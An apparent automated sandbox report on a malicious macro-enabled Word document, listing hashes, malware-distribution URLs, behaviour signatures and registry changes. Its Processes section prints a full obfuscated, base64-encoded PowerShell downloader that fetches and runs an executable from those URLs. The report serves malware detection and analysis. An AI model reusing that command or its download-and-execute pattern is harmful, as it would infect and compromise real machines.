Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29/09/2024, 06:46
Static task
static1
Behavioral task
behavioral1
Sample
fdfd991ced46a4dc2ae4a9ce04aa25c0_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fdfd991ced46a4dc2ae4a9ce04aa25c0_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
fdfd991ced46a4dc2ae4a9ce04aa25c0_JaffaCakes118.doc
-
Size
133KB
-
MD5
fdfd991ced46a4dc2ae4a9ce04aa25c0
-
SHA1
4c736fa3d75f48e8c63aa40202ff224f22f8028f
-
SHA256
27442f20eb59b4d209325e6568821d54267357d72c350b9aac8bdbe721e0235c
-
SHA512
49c7c5f42b6dc4233741b0862c09d2ed3afaf1958e83ea06995aaeb187e568e95ce0f86f9b0d766852612bf09f8754a9021d732a21e258d71a334d2e11a9d314
-
SSDEEP
1536:LA2RD3bNqfNpu39IId5a6XP3Mg8afSqTVyzwyQUpsJNw:VR1qf69xak3MgxSOEzwyQisJNw
Malware Config
Extracted
http://account-creation.tvstartup.com/wp-content/themes/yMqhmRl/
http://305.tvstartup.com/wp-content/hE2GpD/
http://khuranaeyecarecentre.com/article/GQX1/
http://esteticavaleria.com/wp-content/xmLGWWW/
http://yashdemo.yashinfosystems.com/advpanel/OVTRE/
http://eventswifiinternet.com/wp-content/E/
http://opendoorsukraine.com/media/UvBoX8A/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1352 2632 POwersheLL.exe 31 -
Blocklisted process makes network request 8 IoCs
flow pid Process 3 1352 POwersheLL.exe 7 1352 POwersheLL.exe 10 1352 POwersheLL.exe 11 1352 POwersheLL.exe 12 1352 POwersheLL.exe 14 1352 POwersheLL.exe 15 1352 POwersheLL.exe 16 1352 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9FB8DC00-DDEA-461B-B54F-9DB96EC5C609}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{9FB8DC00-DDEA-461B-B54F-9DB96EC5C609} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9FB8DC00-DDEA-461B-B54F-9DB96EC5C609}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{9FB8DC00-DDEA-461B-B54F-9DB96EC5C609}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9FB8DC00-DDEA-461B-B54F-9DB96EC5C609} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2668 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1352 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1352 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2668 WINWORD.EXE 2668 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2668 wrote to memory of 336 2668 WINWORD.EXE 35 PID 2668 wrote to memory of 336 2668 WINWORD.EXE 35 PID 2668 wrote to memory of 336 2668 WINWORD.EXE 35 PID 2668 wrote to memory of 336 2668 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fdfd991ced46a4dc2ae4a9ce04aa25c0_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABBAGkAaQA5AGgAMAA2AD0AKAAnAEcAJwArACcAOAAnACsAKAAnADgAJwArACcAbQBiAHgAYQAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAUgBQAFIAbwBmAGkATABFAFwAbgBXADMAdQBpADUAaQBcAGQANABKADAAZABqAGYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAFUAcgBgAGkAdAB5AHAAcgBPAGAAVABgAE8AYABDAE8ATAAiACAAPQAgACgAKAAnAHQAbABzADEAMgAnACsAJwAsACAAdABsACcAKwAnAHMAJwApACsAJwAxACcAKwAoACcAMQAnACsAJwAsACAAdABsACcAKQArACcAcwAnACkAOwAkAFcAZgBkAGgAdQB5AGUAIAA9ACAAKAAnAEEAJwArACgAJwB6ACcAKwAnAGYAawBjAG4AZQAnACsAJwAwACcAKQApADsAJABDADAAMQBsAF8AXwB3AD0AKAAnAFEAJwArACcAaABsACcAKwAoACcAcQBoAGkAJwArACcAdQAnACkAKQA7ACQAVQBtAHIAZABzAHYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBrAFYAJwArACcAUQBOACcAKwAoACcAdwAnACsAJwAzACcAKwAnAHUAaQA1AGkAawBWACcAKQArACgAJwBRAEQAJwArACcANAAnACsAJwBqADAAZAAnACkAKwAoACcAagBmAGsAVgAnACsAJwBRACcAKQApAC4AIgBSAEUAYABQAGAATABBAEMARQAiACgAKAAnAGsAJwArACcAVgBRACcAKQAsAFsAUwBUAFIAaQBOAGcAXQBbAEMASABhAHIAXQA5ADIAKQApACsAJABXAGYAZABoAHUAeQBlACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABRAGsAbAA5ADgAbgBzAD0AKAAnAFAAJwArACcAMABwACcAKwAoACcAZQA2AG8AJwArACcAeAAnACkAKQA7ACQASAA4AHYAYQBqAHoAYgA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBFAFQALgB3AGUAYgBjAEwAaQBFAG4AdAA7ACQAUwBoAF8ANAByAGUANQA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACcALwAvAGEAJwArACcAYwBjAG8AdQBuAHQALQBjACcAKwAnAHIAJwArACcAZQAnACkAKwAoACcAYQB0ACcAKwAnAGkAbwBuACcAKQArACgAJwAuACcAKwAnAHQAdgBzACcAKQArACcAdAAnACsAKAAnAGEAcgAnACsAJwB0ACcAKQArACcAdQAnACsAKAAnAHAALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdwAnACsAKAAnAHAALQAnACsAJwBjACcAKQArACcAbwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwB0ACcAKwAnAGgAZQAnACsAJwBtACcAKwAnAGUAJwArACcAcwAvAHkAJwArACcATQBxAGgAbQBSAGwALwAqAGgAdAB0AHAAOgAvAC8AJwArACcAMwAwADUALgB0AHYAcwB0AGEAcgB0AHUAJwArACcAcAAuACcAKQArACcAYwAnACsAKAAnAG8AbQAnACsAJwAvAHcAJwArACcAcAAtAGMAbwBuAHQAJwApACsAJwBlACcAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAGgARQAyACcAKwAnAEcAcAAnACkAKwAnAEQALwAnACsAJwAqAGgAJwArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvAC8AJwArACcAawBoACcAKwAnAHUAcgAnACsAJwBhAG4AYQBlACcAKwAnAHkAZQAnACkAKwAoACcAYwBhAHIAZQAnACsAJwBjAGUAJwApACsAKAAnAG4AdAAnACsAJwByAGUALgBjAG8AbQAvACcAKQArACgAJwBhAHIAdABpACcAKwAnAGMAJwApACsAKAAnAGwAZQAnACsAJwAvACcAKQArACgAJwBHACcAKwAnAFEAWAAnACkAKwAnADEAJwArACgAJwAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAoACcAOgAvACcAKwAnAC8AZQAnACsAJwBzAHQAZQB0AGkAYwBhACcAKwAnAHYAYQAnACsAJwBsAGUAJwApACsAKAAnAHIAaQBhAC4AYwBvAG0ALwAnACsAJwB3ACcAKwAnAHAAJwArACcALQBjACcAKwAnAG8AbgB0ACcAKQArACcAZQAnACsAKAAnAG4AdAAvAHgAJwArACcAbQAnACkAKwAoACcATAAnACsAJwBHAFcAVwBXAC8AKgAnACsAJwBoAHQAJwApACsAJwB0ACcAKwAoACcAcAAnACsAJwA6AC8ALwB5ACcAKQArACgAJwBhAHMAJwArACcAaABkACcAKwAnAGUAbQBvAC4AeQBhAHMAJwArACcAaAAnACkAKwAoACcAaQAnACsAJwBuACcAKwAnAGYAbwBzAHkAcwB0AGUAJwArACcAbQBzAC4AJwArACcAYwBvACcAKwAnAG0ALwBhAGQAJwArACcAdgBwACcAKQArACcAYQBuACcAKwAnAGUAbAAnACsAKAAnAC8AJwArACcATwBWACcAKQArACgAJwBUAFIARQAvACoAaAB0AHQAcAAnACsAJwA6AC8AJwArACcALwBlACcAKQArACgAJwB2AGUAJwArACcAbgB0ACcAKQArACcAcwB3ACcAKwAoACcAaQAnACsAJwBmAGkAJwApACsAKAAnAGkAbgAnACsAJwB0AGUAcgBuACcAKwAnAGUAJwApACsAJwB0AC4AJwArACgAJwBjACcAKwAnAG8AbQAvAHcAJwApACsAJwBwACcAKwAnAC0AYwAnACsAKAAnAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC8AJwApACsAKAAnAEUAJwArACcALwAqAGgAJwApACsAKAAnAHQAdAAnACsAJwBwADoAJwApACsAJwAvACcAKwAoACcALwAnACsAJwBvACcAKwAnAHAAZQBuAGQAbwBvAHIAJwApACsAKAAnAHMAdQBrAHIAYQBpAG4AZQAnACsAJwAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvACcAKwAnAG0AZQBkAGkAJwArACcAYQAnACkAKwAoACcALwBVAHYAJwArACcAQgAnACkAKwAoACcAbwAnACsAJwBYADgAQQAvACcAKQApAC4AIgBTAFAAYABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEgANQBkAF8AZQA2AGoAPQAoACcASAAnACsAKAAnAGwAJwArACcAcABxACcAKQArACgAJwB6AGkAJwArACcANAAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEoAZgBkAHkAOAA1ADgAIABpAG4AIAAkAFMAaABfADQAcgBlADUAKQB7AHQAcgB5AHsAJABIADgAdgBhAGoAegBiAC4AIgBkAG8AVwBgAE4ATABgAG8AYABBAGQAZgBpAEwAZQAiACgAJABKAGYAZAB5ADgANQA4ACwAIAAkAFUAbQByAGQAcwB2ADAAKQA7ACQAUAB1AHEAYwA0AGIAaAA9ACgAKAAnAEwAOQAxAGIAJwArACcAdQBzACcAKQArACcAZwAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVQBtAHIAZABzAHYAMAApAC4AIgBsAGAARQBOAEcAdABIACIAIAAtAGcAZQAgADIANAAzADAANgApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACgAJABVAG0AcgBkAHMAdgAwACkAOwAkAEYAZgBvAGUAdgB3ADMAPQAoACgAJwBLAHgAJwArACcAdgAnACkAKwAnADkAYwAnACsAJwBjAG4AJwApADsAYgByAGUAYQBrADsAJABaAHQAawAwAHYAbABqAD0AKAAoACcASgAnACsAJwB1AGcAZgAnACkAKwAoACcAaQBuACcAKwAnADMAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAOABzAGQAbwBtAGEAPQAoACcAUgAnACsAJwBiACcAKwAoACcAbwAnACsAJwBvAHcANABuACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD513fd72f1a30909d66bb1ef00828d40a1
SHA17a06a996de943a9b025f0897563e62bd2856a46c
SHA25656a8fa2a77193880c5b8e18dedeaa22c6cef635d153c2e9037278d4188261afa
SHA51279b8393387dad4d01a24c2e1fb878193a941dfcf2dfe56eef082f502b1836045af37a023e43e61fe1705f4ce016186433045663f9644354fdc9887067e79f81d